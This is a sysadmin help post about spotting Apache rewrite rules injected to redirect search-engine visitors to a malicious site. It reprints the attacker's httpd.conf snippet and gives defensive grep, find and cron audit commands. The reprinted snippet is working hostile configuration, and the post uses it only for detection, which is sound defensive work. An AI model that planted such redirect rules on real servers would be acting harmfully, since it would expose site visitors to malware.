A friend of mine just told me that he's been seeing hackers slip a few lines of code into their Apache web server configuration and have all their traffic redirected to porn sites. Now I'm paranoid! How can I detect if this has happened to my own server?
This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus.
Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google...
Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself.
A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L]
Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err

What this does is cause queries sent to the server with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (i.e., the major search engines) to have the query rewritten to be a redirect to the nefarious IP address URL. Definitely not good!
But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see:
$ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L]

Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file.
One more tweak and you could have a simple script that, when run from a cron job, would email you if any of this bad code showed up (Linux geeks know what I'm talking about):
Easy enough, right?
Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file.
You can check for this from the command line again:
$ cd /usr/local/apache/htdocs
$ find . -name ".htaccess" -print

Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this:

AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null
AuthName "Growing Your Biz w/ Google Course"
AuthType Basic
<Limit GET>
require user taylor
require user google
require user steven
</Limit>

Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time:

$ grep http: $(find . -name ".htaccess" -print)
$

Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above.
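The cron-job script the post refers to, written here as an added example rather than the original post's script: it folds the httpd.conf check and the .htaccess check into one function, additionally flags ErrorDocument lines that point at an external URL (the malicious snippet used that directive too), and runs against a constructed sample tree with placeholder paths and a documentation-range IP in place of the post's redacted one.

```shell
#!/bin/sh
# Added example, not the script from the original post. It folds the two
# checks above (RewriteRule lines containing "http:" in httpd.conf, then the
# same search across every .htaccess under the document root) into one
# function that a cron job can run, and also flags ErrorDocument lines that
# point at an external URL, since the malicious snippet used that too.

# Usage: find_external_rewrites CONF DOCROOT [ALLOWED_HOSTS_REGEX]
# Prints file:line:text for each RewriteRule/ErrorDocument whose target is an
# absolute http(s) URL, minus lines matching the optional allowlist regex.
# Returns 0 when nothing suspicious is found, 1 otherwise.
find_external_rewrites() {
    conf="$1"; docroot="$2"; allow="${3:-}"
    # /dev/null as a second file makes grep prefix the filename portably
    hits=$( {
        grep -inE 'rewriterule|errordocument' "$conf" /dev/null
        find "$docroot" -name .htaccess \
            -exec grep -inE 'rewriterule|errordocument' {} /dev/null \;
    } 2>/dev/null | grep -iE 'https?:' \
      | { if [ -n "$allow" ]; then grep -vE "$allow"; else cat; fi; } || true )
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Constructed sample tree so the example runs offline; 203.0.113.9 is a
# documentation-range placeholder standing in for the post's redacted IP.
TMP=$(mktemp -d)
mkdir -p "$TMP/htdocs/blog"
cat > "$TMP/httpd.conf" <<'EOF'
RewriteEngine On
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC]
RewriteRule .* http://203.0.113.9/in.html?s=ipw2 [R,L]
Errordocument 404 http://203.0.113.9/in.html?s=ipw2_err
EOF
printf 'AuthType Basic\nrequire user taylor\n' > "$TMP/htdocs/.htaccess"
printf 'RewriteRule .* http://203.0.113.9/in.html [R,L]\n' > "$TMP/htdocs/blog/.htaccess"

# From cron, pipe the output to mail (placeholder address), for example:
#   0 3 * * * /usr/local/sbin/check_rewrites.sh | mail -s "rewrite audit" admin@example.com
find_external_rewrites "$TMP/httpd.conf" "$TMP/htdocs" 'feeds\.feedburner\.com' \
    || echo "WARNING: external redirects found, review the lines above"
```

The allowlist argument is what keeps legitimate rules like the Feedburner redirects out of the report, so cron only mails you when something new appears.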
Hope that helps you out!
Thanks...